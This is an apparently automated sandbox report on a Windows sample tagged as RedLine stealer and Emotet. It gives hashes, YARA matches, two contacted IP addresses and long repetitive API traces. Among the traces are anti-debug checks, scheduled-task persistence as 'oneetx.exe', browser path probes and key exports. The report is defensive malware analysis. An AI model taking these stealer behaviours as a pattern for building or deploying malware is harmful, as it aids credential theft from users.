popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

photo230.exe

RedLine stealer Emotet Gen1 RedLine Stealer Malicious Library Confuser .NET UPX Admin Tool (Sysinternals etc ...) Code injection SMTP Http API Internet API HTTP PWS AntiDebug PE File OS Processor Check PE32 CAB AntiVM DLL
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 May 16, 2023, 9:11 a.m. May 16, 2023, 9:13 a.m.
Size 1.1MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 bd745f43c090fd7fc5aeae0ec6b48d5a
SHA256 f23313732951aeb7b3c9582641133fdefad1ea524908df534e30c8288e76b243
CRC32 18C188C8
ssdeep 24576:vyI+UWE60Rwn0LI4/S6i0Pyz2lTwvrcKm/OL0RAu:6Iwn0LpHqz2lczpmVA
PDB Path wextract.pdb
Yara
  • UPX_Zero - UPX packed file
  • Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet
  • Malicious_Library_Zero - Malicious_Library
  • CAB_file_format - CAB archive file
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
185.161.248.25 Active Moloch
77.91.124.20 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: SUCCESS: The scheduled task "oneetx.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: N
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005a7b58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005a7b58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005aa140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005aa140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005aa040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005aa040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0048abc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0048abc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0048abc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0048abc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0048ac48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0048ac48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0048ab48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0048ab48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0048ab48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0048ab48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0048ab48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0048abc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0048abc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0048adc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0048b688
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0048b688
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0048b548
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00592ce0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00592ce0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00592ce0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00592ce0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00592d60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00592d60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00592c60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00592c60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00592c60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00592c60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00592c60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00592ce0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00592ce0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00592ee0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593660
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593660
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005934a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003434e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003434e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00346338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00346338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003463f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003463f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0061f9c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0061f9c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0061fa08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0061fa08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
pdb_path wextract.pdb
file C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file C:\Program Files\Mozilla Firefox\firefox.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
resource name AVI
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
a9556928+0x1fa2 @ 0x401fa2

exception.instruction_r: f3 aa 8b 45 f0 8b 4d 08 8b 55 10 03 c8 2b d0 52
exception.symbol: a9556928+0xf088
exception.instruction: stosb byte ptr es:[edi], al
exception.module: a9556928.exe
exception.exception_code: 0xc0000005
exception.offset: 61576
exception.address: 0x40f088
registers.esp: 1636996
registers.edi: 4350244
registers.eax: 0
registers.ebp: 1637012
registers.edx: 0
registers.ebx: 0
registers.esi: 37497672
registers.ecx: 12
1 0 0

__exception__

 stacktrace: 
a9556928+0xf054 @ 0x40f054
a9556928+0xf0a0 @ 0x40f0a0
a9556928+0x1fa2 @ 0x401fa2

exception.instruction_r: 66 0f 7f 47 50 66 0f 7f 47 60 66 0f 7f 47 70 8d
exception.symbol: a9556928+0xefff
exception.address: 0x40efff
exception.module: a9556928.exe
exception.exception_code: 0xc0000005
exception.offset: 61439
registers.esp: 1636940
registers.edi: 4353968
registers.eax: 4350256
registers.ebp: 1636944
registers.edx: 127
registers.ebx: 0
registers.esi: 37497672
registers.ecx: 340
1 0 0

__exception__

 stacktrace: 
a9556928+0xf054 @ 0x40f054
a9556928+0xf0a0 @ 0x40f0a0
a9556928+0x1fa2 @ 0x401fa2

exception.instruction_r: 66 0f 7f 47 50 66 0f 7f 47 60 66 0f 7f 47 70 8d
exception.symbol: a9556928+0xefff
exception.address: 0x40efff
exception.module: a9556928.exe
exception.exception_code: 0xc0000005
exception.offset: 61439
registers.esp: 1636940
registers.edi: 4358064
registers.eax: 4350256
registers.ebp: 1636944
registers.edx: 127
registers.ebx: 0
registers.esi: 37497672
registers.ecx: 308
1 0 0

__exception__

 stacktrace: 
a9556928+0xf054 @ 0x40f054
a9556928+0xf0a0 @ 0x40f0a0
a9556928+0x1fa2 @ 0x401fa2

exception.instruction_r: 66 0f 7f 47 50 66 0f 7f 47 60 66 0f 7f 47 70 8d
exception.symbol: a9556928+0xefff
exception.address: 0x40efff
exception.module: a9556928.exe
exception.exception_code: 0xc0000005
exception.offset: 61439
registers.esp: 1636940
registers.edi: 4362160
registers.eax: 4350256
registers.ebp: 1636944
registers.edx: 127
registers.ebx: 0
registers.esi: 37497672
registers.ecx: 276
1 0 0

__exception__

 stacktrace: 
a9556928+0xf054 @ 0x40f054
a9556928+0xf0a0 @ 0x40f0a0
a9556928+0x1fa2 @ 0x401fa2

exception.instruction_r: 66 0f 7f 47 50 66 0f 7f 47 60 66 0f 7f 47 70 8d
exception.symbol: a9556928+0xefff
exception.address: 0x40efff
exception.module: a9556928.exe
exception.exception_code: 0xc0000005
exception.offset: 61439
registers.esp: 1636940
registers.edi: 4366256
registers.eax: 4350256
registers.ebp: 1636944
registers.edx: 127
registers.ebx: 0
registers.esi: 37497672
registers.ecx: 244
1 0 0

__exception__

 stacktrace: 
a9556928+0xf054 @ 0x40f054
a9556928+0xf0a0 @ 0x40f0a0
a9556928+0x1fa2 @ 0x401fa2

exception.instruction_r: 66 0f 7f 47 50 66 0f 7f 47 60 66 0f 7f 47 70 8d
exception.symbol: a9556928+0xefff
exception.address: 0x40efff
exception.module: a9556928.exe
exception.exception_code: 0xc0000005
exception.offset: 61439
registers.esp: 1636940
registers.edi: 4370352
registers.eax: 4350256
registers.ebp: 1636944
registers.edx: 127
registers.ebx: 0
registers.esi: 37497672
registers.ecx: 212
1 0 0

__exception__

 stacktrace: 
a9556928+0xf054 @ 0x40f054
a9556928+0xf0a0 @ 0x40f0a0
a9556928+0x1fa2 @ 0x401fa2

exception.instruction_r: 66 0f 7f 47 50 66 0f 7f 47 60 66 0f 7f 47 70 8d
exception.symbol: a9556928+0xefff
exception.address: 0x40efff
exception.module: a9556928.exe
exception.exception_code: 0xc0000005
exception.offset: 61439
registers.esp: 1636940
registers.edi: 4374448
registers.eax: 4350256
registers.ebp: 1636944
registers.edx: 127
registers.ebx: 0
registers.esi: 37497672
registers.ecx: 180
1 0 0

__exception__

 stacktrace: 
a9556928+0xf054 @ 0x40f054
a9556928+0xf0a0 @ 0x40f0a0
a9556928+0x1fa2 @ 0x401fa2

exception.instruction_r: 66 0f 7f 47 50 66 0f 7f 47 60 66 0f 7f 47 70 8d
exception.symbol: a9556928+0xefff
exception.address: 0x40efff
exception.module: a9556928.exe
exception.exception_code: 0xc0000005
exception.offset: 61439
registers.esp: 1636940
registers.edi: 4378544
registers.eax: 4350256
registers.ebp: 1636944
registers.edx: 127
registers.ebx: 0
registers.esi: 37497672
registers.ecx: 148
1 0 0

__exception__

 stacktrace: 
a9556928+0xf054 @ 0x40f054
a9556928+0xf0a0 @ 0x40f0a0
a9556928+0x1fa2 @ 0x401fa2

exception.instruction_r: 66 0f 7f 47 50 66 0f 7f 47 60 66 0f 7f 47 70 8d
exception.symbol: a9556928+0xefff
exception.address: 0x40efff
exception.module: a9556928.exe
exception.exception_code: 0xc0000005
exception.offset: 61439
registers.esp: 1636940
registers.edi: 4382640
registers.eax: 4350256
registers.ebp: 1636944
registers.edx: 127
registers.ebx: 0
registers.esi: 37497672
registers.ecx: 116
1 0 0

__exception__

 stacktrace: 
a9556928+0xf054 @ 0x40f054
a9556928+0xf0a0 @ 0x40f0a0
a9556928+0x1fa2 @ 0x401fa2

exception.instruction_r: 66 0f 7f 47 50 66 0f 7f 47 60 66 0f 7f 47 70 8d
exception.symbol: a9556928+0xefff
exception.address: 0x40efff
exception.module: a9556928.exe
exception.exception_code: 0xc0000005
exception.offset: 61439
registers.esp: 1636940
registers.edi: 4386736
registers.eax: 4350256
registers.ebp: 1636944
registers.edx: 127
registers.ebx: 0
registers.esi: 37497672
registers.ecx: 84
1 0 0

__exception__

 stacktrace: 
a9556928+0xf054 @ 0x40f054
a9556928+0xf0a0 @ 0x40f0a0
a9556928+0x1fa2 @ 0x401fa2

exception.instruction_r: 66 0f 7f 47 50 66 0f 7f 47 60 66 0f 7f 47 70 8d
exception.symbol: a9556928+0xefff
exception.address: 0x40efff
exception.module: a9556928.exe
exception.exception_code: 0xc0000005
exception.offset: 61439
registers.esp: 1636940
registers.edi: 4390832
registers.eax: 4350256
registers.ebp: 1636944
registers.edx: 127
registers.ebx: 0
registers.esi: 37497672
registers.ecx: 52
1 0 0

__exception__

 stacktrace: 
a9556928+0xf054 @ 0x40f054
a9556928+0xf0a0 @ 0x40f0a0
a9556928+0x1fa2 @ 0x401fa2

exception.instruction_r: 66 0f 7f 47 50 66 0f 7f 47 60 66 0f 7f 47 70 8d
exception.symbol: a9556928+0xefff
exception.address: 0x40efff
exception.module: a9556928.exe
exception.exception_code: 0xc0000005
exception.offset: 61439
registers.esp: 1636940
registers.edi: 4394928
registers.eax: 4350256
registers.ebp: 1636944
registers.edx: 127
registers.ebx: 0
registers.esi: 37497672
registers.ecx: 20
1 0 0

__exception__

 stacktrace: 
0xc83e54
0xc83d76
0xc82505
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc83f48
registers.esp: 4255416
registers.edi: 4255468
registers.eax: 0
registers.ebp: 4255480
registers.edx: 4629072
registers.ebx: 4256364
registers.esi: 45749844
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0xc8a5ee
0xc8a4af
0xc8a3ad
0xc8900a
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 84 17 f2 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8aef6
registers.esp: 4254260
registers.edi: 4254484
registers.eax: 0
registers.ebp: 4254496
registers.edx: 15865364
registers.ebx: 4256364
registers.esi: 46180956
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0xc8e740
0xc8aa23
0xc8a4af
0xc8a3ad
0xc8900a
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8e783
registers.esp: 4254472
registers.edi: 4254760
registers.eax: 0
registers.ebp: 4254480
registers.edx: 0
registers.ebx: 4256364
registers.esi: 46180956
registers.ecx: 47430152
1 0 0

__exception__

 stacktrace: 
0xc8a5ee
0xc8a4af
0xc8a3c5
0xc8900a
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
